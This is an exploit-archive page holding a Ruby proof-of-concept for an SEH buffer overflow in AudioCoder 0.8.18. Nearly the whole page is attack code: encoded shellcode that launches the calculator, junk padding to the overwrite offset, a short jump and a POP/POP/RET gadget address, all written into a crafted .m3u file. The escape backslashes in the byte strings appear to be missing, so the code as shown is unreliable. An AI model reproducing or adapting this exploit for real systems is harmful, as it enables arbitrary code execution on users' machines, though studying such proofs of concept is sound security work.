AudioCoder 0.8.18 - Buffer Overflow Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : AudioCoder 0.8.18 - Buffer Overflow Exploit (SEH)
# Published : 2013-05-02
# Author :
# Previous Title : ABBS Audio Media Player v3.1 (.lst) Buffer Overflow
# Next Title : FuzeZip 1.0.0.131625 - SEH Buffer Overflow

#!/usr/bin/env ruby
# Exploit Title:AudioCoder 0.8.18 Buffer Overflow Exploit (SEH)
# Download link :http://www.mediacoderhq.com/getfile.htm?site=dl.mediacoderhq.com&file=AudioCoder-0.8.18.exe
# Vulnerable Product:AudioCoder
# Date (found): 30.04.2013
# Date (publish): 01.05.2013
# RST
# Author: metacom
# Version: version 0.8.18
# Category: poc
# Tested on: windows 7 German  
# Exploit-DB Note:
# This works on Windows 7 Pro Eng

begin
 #calc
 shellcode =
"x89xe0xdbxc8xd9x70xf4x5bx53x59x49x49x49x49" +
"x43x43x43x43x43x43x51x5ax56x54x58x33x30x56" +
"x58x34x41x50x30x41x33x48x48x30x41x30x30x41" +
"x42x41x41x42x54x41x41x51x32x41x42x32x42x42" +
"x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4b" +
"x58x4dx59x53x30x55x50x53x30x43x50x4dx59x5a" +
"x45x56x51x58x52x52x44x4cx4bx50x52x56x50x4c" +
"x4bx50x52x54x4cx4cx4bx31x42x45x44x4cx4bx34" +
"x32x31x38x44x4fx4fx47x51x5ax37x56x30x31x4b" +
"x4fx50x31x49x50x4ex4cx57x4cx35x31x33x4cx53" +
"x32x56x4cx37x50x49x51x38x4fx54x4dx35x51x49" +
"x57x4dx32x5ax50x36x32x36x37x4cx4bx46x32x54" +
"x50x4cx4bx47x32x37x4cx53x31x4ex30x4cx4bx47" +
"x30x54x38x4bx35x49x50x42x54x51x5ax35x51x4e" +
"x30x50x50x4cx4bx57x38x55x48x4cx4bx36x38x31" +
"x30x45x51x59x43x4bx53x57x4cx30x49x4cx4bx30" +
"x34x4cx4bx55x51x4ex36x30x31x4bx4fx50x31x49" +
"x50x4ex4cx39x51x48x4fx34x4dx43x31x49x57x46" +
"x58x4bx50x42x55x5ax54x43x33x43x4dx5ax58x37" +
"x4bx33x4dx57x54x53x45x4ax42x30x58x4cx4bx56" +
"x38x36x44x43x31x48x53x35x36x4cx4bx54x4cx30" +
"x4bx4cx4bx56x38x45x4cx53x31x39x43x4cx4bx54" +
"x44x4cx4bx35x51x4ex30x4bx39x51x54x31x34x37" +
"x54x51x4bx51x4bx55x31x30x59x30x5ax46x31x4b" +
"x4fx4dx30x31x48x51x4fx50x5ax4cx4bx42x32x4a" +
"x4bx4bx36x51x4dx52x4ax43x31x4cx4dx4cx45x48" +
"x39x55x50x55x50x53x30x50x50x43x58x36x51x4c" +
"x4bx32x4fx4dx57x4bx4fx39x45x4fx4bx4cx30x48" +
"x35x39x32x56x36x53x58x59x36x5ax35x4fx4dx4d" +
"x4dx4bx4fx38x55x57x4cx35x56x33x4cx44x4ax4b" +
"x30x4bx4bx4dx30x33x45x54x45x4fx4bx50x47x42" +
"x33x33x42x42x4fx42x4ax43x30x31x43x4bx4fx59" +
"x45x32x43x43x51x42x4cx33x53x36x4ex43x55x43" +
"x48x55x35x43x30x41x41"
 
 file = "fuzz.m3u"
 head = "http://"
 junk = "x90" * 765 # Distance to overwrite EIP
 nseh = "xEBx06x90x90" # Short (6 bytes) jump!
 seh  = "xEEx04x01x66" # POP ECX / POP ECX / RETN from libiconv-2.dll
 nops = "x90" * 80
 textfile = open(file , 'w')
 textfile.write(head + junk + nseh + seh + nops + shellcode)
 textfile.close()

 puts
 puts " Vulnerable file created!...n"

end